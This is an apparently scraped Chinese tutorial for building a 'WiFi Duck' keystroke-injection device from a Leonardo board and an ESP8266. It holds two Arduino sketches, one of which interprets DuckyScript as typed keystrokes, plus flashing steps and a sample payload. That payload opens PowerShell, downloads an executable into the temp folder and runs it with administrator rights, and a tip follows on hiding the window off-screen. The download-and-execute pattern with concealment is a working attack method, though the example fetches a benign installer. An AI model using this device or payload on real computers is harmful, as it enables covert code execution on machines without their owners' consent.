wifiduck

参考地址

所需材料

1.CJMCU-Beetle Leonardo USB ATMEGA32U42.ESP8266-12F3.AMS1117-3.3V电源模块

所需软件

ARDUINO IDE 下载地址&＃xff1a;https://www.arduino.cc/en/Main/SoftwareNodeMCU Flasher 下载地址&＃xff1a;https://github.com/nodemcu/nodemcu-flasher

操作步骤

1.ino

int program_pin &＃61; 12;
int enable_pin &＃61; 13;
void setup() {Serial1.begin(115200);Serial.begin(115200);pinMode(enable_pin, OUTPUT);pinMode(program_pin, OUTPUT);digitalWrite(program_pin, LOW);digitalWrite(enable_pin, HIGH);
}
void loop() {while (Serial1.available()) {Serial.write((uint8_t) Serial1.read());}if (Serial.available()) {while (Serial.available()) {Serial1.write((uint8_t) Serial.read());}}
}

2.ino

#include
#define BAUD_RATE 57200#define ExternSerial Serial1String bufferStr &＃61; "";
String last &＃61; "";int defaultDelay &＃61; 0;void Line(String _line)
{int firstSpace &＃61; _line.indexOf(" ");if (firstSpace &＃61;&＃61; -1) Press(_line);else if (_line.substring(0, firstSpace) &＃61;&＃61; "STRING") {for (int i &＃61; firstSpace &＃43; 1; i <_line.length(); i&＃43;&＃43;) Keyboard.write(_line[i]);}else if (_line.substring(0, firstSpace) &＃61;&＃61; "DELAY") {int delaytime &＃61; _line.substring(firstSpace &＃43; 1).toInt();delay(delaytime);}else if (_line.substring(0, firstSpace) &＃61;&＃61; "DEFAULTDELAY") defaultDelay &＃61; _line.substring(firstSpace &＃43; 1).toInt();else if (_line.substring(0, firstSpace) &＃61;&＃61; "REM") {} //nothing :/else if (_line.substring(0, firstSpace) &＃61;&＃61; "REPLAY") {int replaynum &＃61; _line.substring(firstSpace &＃43; 1).toInt();while (replaynum){Line(last);--replaynum;}} else {String remain &＃61; _line;while (remain.length() > 0) {int latest_space &＃61; remain.indexOf(" ");if (latest_space &＃61;&＃61; -1) {Press(remain);remain &＃61; "";}else {Press(remain.substring(0, latest_space));remain &＃61; remain.substring(latest_space &＃43; 1);}delay(5);}}Keyboard.releaseAll();delay(defaultDelay);
}void Press(String b) {if (b.length() &＃61;&＃61; 1) Keyboard.press(char(b[0]));else if (b.equals("ENTER")) Keyboard.press(KEY_RETURN);else if (b.equals("CTRL")) Keyboard.press(KEY_LEFT_CTRL);else if (b.equals("SHIFT")) Keyboard.press(KEY_LEFT_SHIFT);else if (b.equals("ALT")) Keyboard.press(KEY_LEFT_ALT);else if (b.equals("GUI")) Keyboard.press(KEY_LEFT_GUI);else if (b.equals("UP") || b.equals("UPARROW")) Keyboard.press(KEY_UP_ARROW);else if (b.equals("DOWN") || b.equals("DOWNARROW")) Keyboard.press(KEY_DOWN_ARROW);else if (b.equals("LEFT") || b.equals("LEFTARROW")) Keyboard.press(KEY_LEFT_ARROW);else if (b.equals("RIGHT") || b.equals("RIGHTARROW")) Keyboard.press(KEY_RIGHT_ARROW);else if (b.equals("DELETE")) Keyboard.press(KEY_DELETE);else if (b.equals("PAGEUP")) Keyboard.press(KEY_PAGE_UP);else if (b.equals("PAGEDOWN")) Keyboard.press(KEY_PAGE_DOWN);else if (b.equals("HOME")) Keyboard.press(KEY_HOME);else if (b.equals("ESC")) Keyboard.press(KEY_ESC);else if (b.equals("BACKSPACE")) Keyboard.press(KEY_BACKSPACE);else if (b.equals("INSERT")) Keyboard.press(KEY_INSERT);else if (b.equals("TAB")) Keyboard.press(KEY_TAB);else if (b.equals("END")) Keyboard.press(KEY_END);else if (b.equals("CAPSLOCK")) Keyboard.press(KEY_CAPS_LOCK);else if (b.equals("F1")) Keyboard.press(KEY_F1);else if (b.equals("F2")) Keyboard.press(KEY_F2);else if (b.equals("F3")) Keyboard.press(KEY_F3);else if (b.equals("F4")) Keyboard.press(KEY_F4);else if (b.equals("F5")) Keyboard.press(KEY_F5);else if (b.equals("F6")) Keyboard.press(KEY_F6);else if (b.equals("F7")) Keyboard.press(KEY_F7);else if (b.equals("F8")) Keyboard.press(KEY_F8);else if (b.equals("F9")) Keyboard.press(KEY_F9);else if (b.equals("F10")) Keyboard.press(KEY_F10);else if (b.equals("F11")) Keyboard.press(KEY_F11);else if (b.equals("F12")) Keyboard.press(KEY_F12);else if (b.equals("SPACE")) Keyboard.press(&＃39; &＃39;);//else Serial.println("not found :&＃39;"&＃43;b&＃43;"&＃39;("&＃43;String(b.length())&＃43;")");
}void setup() {Serial.begin(BAUD_RATE);ExternSerial.begin(BAUD_RATE);pinMode(13, OUTPUT);digitalWrite(13, HIGH);Keyboard.begin();
}void loop() {if (ExternSerial.available()) {bufferStr &＃61; ExternSerial.readStringUntil("END");Serial.println(bufferStr);}if (bufferStr.length() > 0) {bufferStr.replace("\r", "\n");bufferStr.replace("\n\n", "\n");while (bufferStr.length() > 0) {int latest_return &＃61; bufferStr.indexOf("\n");if (latest_return &＃61;&＃61; -1) {Serial.println("run: " &＃43; bufferStr);Line(bufferStr);bufferStr &＃61; "";} else {Serial.println("run: &＃39;" &＃43; bufferStr.substring(0, latest_return) &＃43; "&＃39;");Line(bufferStr.substring(0, latest_return));last &＃61; bufferStr.substring(0, latest_return);bufferStr &＃61; bufferStr.substring(latest_return &＃43; 1);}}bufferStr &＃61; "";ExternSerial.write(0x99);Serial.println("done");}
}

esp8266_wifi_duck_4mb.bin下载

其实很简单&＃xff0c;如电路图连接起来

装环境&＃xff0c;找对端口&＃xff0c;把1.ino上传&＃xff0c;接着设备会重启&＃xff0c;

再选择端口&＃xff0c;把bin用NodeMCU Flasher刷进去&＃xff0c;

断开设备&＃xff0c;用电烙铁焊断红框中的那条线&＃xff0c;再把设备插上去&＃xff0c;

再用Arduino上传2.ino&＃xff0c;过一会就可以看到 WIFI Duck,密码quackquack,

管理IP和WIFI KILL一样是192.168.4.1&＃xff0c;里面有DUCK Script 的语法介绍&＃xff08;没写全不过够用&＃xff09;

DELAY 500
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 500
STRING (new-object System.net.WebClient).DownloadFile(&＃39;https://dl.360safe.com/360/inst.exe&＃39;,$env:TMP%2b&＃39;\a.exe&＃39;)
DELAY 500
ENTER
DELAY 5000
STRING cd $env:TMP
DELAY 500
ENTER
STRING ./a
DELAY 500
ENTER
DELAY 1000
LEFT
DELAY 500
ENTER

执行代码&＃xff0c;powershell下载360管理员权限运行&＃xff0c;

ALT&＃43;SPACE M LEFTARROW REPLAY100 也可以这样把窗口隐藏

这个版本的BIN有BUG加减和一些符号不能打&＃xff0c;我看了下前后端的源码&＃xff0c;

只要在view.htm下面的script加个正则过滤下就好了&＃xff0c;

document.getElementById(“scriptTextArea”).value.replase(/&＃43;?/g, ‘%2b’);

如果懒得话可以直接URL编码失效的字符就可以&＃xff0c;

翻不了墙的可以在这下

链接&＃xff1a;https://pan.baidu.com/s/1MIrYe9C3YnM72LaA-J2Gvw 密码&＃xff1a;vjqj